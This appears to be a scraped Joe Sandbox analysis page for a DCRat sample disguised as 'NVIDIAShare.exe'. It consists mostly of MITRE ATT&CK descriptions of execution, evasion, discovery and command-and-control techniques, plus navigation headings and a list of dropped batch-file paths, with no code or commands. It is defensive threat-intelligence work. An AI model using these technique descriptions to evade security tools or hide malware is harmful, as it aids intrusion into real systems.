Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report NVIDIAShare.exe.bin.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: DCRat

Yara Signatures

Initial Sample

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Software Vulnerabilities

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\NVIDIA Container.exe.log

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\hBoBqOIwjXsCbkOMEKwZ.exe.log

C:\Users\user\AppData\Local\Temp\1LArpmQ7xZ.bat

C:\Users\user\AppData\Local\Temp\1QWUF8ga47.bat

C:\Users\user\AppData\Local\Temp\B0uJAwGmBV.bat

C:\Users\user\AppData\Local\Temp\FuUFRpewDb.bat

C:\Users\user\AppData\Local\Temp\L4pr7KvdK9.bat

C:\Users\user\AppData\Local\Temp\M51c8ynRzi

C:\Users\user\AppData\Local\Temp\bcDVgvLjKy

C:\Users\user\AppData\Local\Temp\c1OxIfqEM4

Windows Analysis Report
NVIDIAShare.exe.bin.exe

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre